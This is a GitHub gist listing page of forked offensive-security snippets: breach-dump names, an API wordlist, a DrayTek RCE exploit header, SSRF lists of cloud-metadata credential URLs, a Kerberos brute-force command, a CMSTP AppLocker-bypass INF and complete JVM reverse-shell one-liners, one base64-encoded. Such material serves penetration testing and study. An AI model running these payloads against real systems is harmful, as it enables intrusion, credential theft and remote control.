nil0x42's tips & tricks
- Scrape twitter account of all github followers of target user on GitHub
- Scrape twitter account of all stargazers of target project on GitHub
m00zh33
m00zh33
/ DataViper full list
Created
June 7, 2021 02:15
— forked from campuscodi/DataViper full list
Gist created and used for ZDNet article: https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| People Data Labs 1216656058 | |
| verifications.io 763574253 | |
| Collection 1 759264286 | |
| Exploit.in 733936374 | |
| Antipublic 561703015 | |
| Oxydata.io 406994204 | |
| MySpace 360713781 | |
| Cloud154 326105933 | |
| Exactis 298885050 | |
| Unknown Facebook data (204.12.215.107) 292717675 |
m00zh33
/ api_wordlist.txt
Created
June 3, 2021 09:24
— forked from helcaraxeals/api_wordlist.txt
api wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /2 | |
| /graphql-proxy/admin | |
| /3.0/ | |
| /3ds_callback | |
| /3ds_update_payment_callback | |
| /accounts | |
| /active | |
| /activity | |
| /actuator | |
| /actuator/auditevents |
m00zh33
/ Awesome_GitHub_OSINT.md
Created
October 16, 2020 01:27
— forked from nil0x42/Awesome_GitHub_OSINT.md
Awesome GitHub OSINT
m00zh33
/ CVE-2020-8515.go
Created
March 30, 2020 02:28
— forked from 0xsha/CVE-2020-8515.go
CVE-2020-8515: DrayTek pre-auth remote root RCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| CVE-2020-8515: DrayTek pre-auth remote root RCE | |
| Mon Mar 30 2020 - 0xsha.io | |
| Affected: |
m00zh33
/ cloud_metadata.txt
Created
November 26, 2019 02:17
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
m00zh33
/ cloud_metadata.txt
Created
November 26, 2019 02:16
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
m00zh33
/ WAHH_Task_Checklist.md
Created
November 26, 2019 02:13
— forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
m00zh33
/ kerberos_attacks_cheatsheet.md
Created
August 28, 2019 00:53
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
m00zh33
/ JVM_POST_EXPLOIT.md
Created
July 30, 2019 02:03
— forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
m00zh33
/ pentestlab-dll.inf
Created
January 4, 2019 01:30
— forked from netbiosX/pentestlab-dll.inf
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| RegisterOCXs=RegisterOCXSection | |
| [RegisterOCXSection] | |
| C:\Users\test.PENTESTLAB\pentestlab.dll |
NewerOlder